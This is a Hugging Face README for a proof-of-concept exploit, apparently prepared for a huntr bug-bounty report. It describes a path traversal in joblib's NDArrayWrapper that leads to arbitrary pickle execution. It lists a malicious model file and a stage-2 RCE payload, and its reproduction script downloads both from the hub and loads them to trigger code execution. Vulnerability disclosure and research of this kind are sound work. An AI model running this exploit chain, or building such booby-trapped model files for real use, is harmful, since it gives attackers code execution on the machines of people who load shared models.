joblib-ndarray-poc / README.md
th3-j0k3r's picture
Add README.md
641cc65 verified
|
Raw
History Blame Contribute Delete
1.11 kB
---
license: mit
tags:
- security
- poc
---
# joblib NDArrayWrapper Path Traversal PoC
Security research PoC for huntr MFV submission.
**Vulnerability:** `NDArrayWrapper.read()` in `joblib/numpy_pickle_compat.py` uses an unsanitized
`self.filename` field (from inside the pickle) in `os.path.join()`, then calls
`numpy.load(filename, allow_pickle=True)` — enabling path traversal to arbitrary pickle execution.
**Affected version:** joblib 1.5.3 (latest)
## Files
- `evil.joblib` — malicious model file (NDArrayWrapper with `filename="../payload.npy"`)
- `payload.npy` — stage-2 RCE pickle (place one directory above evil.joblib)
## Reproduction
```bash
pip3 install joblib==1.5.3 numpy
python3 -c "
import os, joblib
from huggingface_hub import hf_hub_download
os.makedirs('/tmp/poc_model', exist_ok=True)
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'payload.npy', local_dir='/tmp')
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'evil.joblib', local_dir='/tmp/poc_model')
try: joblib.load('/tmp/poc_model/evil.joblib')
except: pass
print(open('/tmp/jl_rce_proof.txt').read().strip())
"
```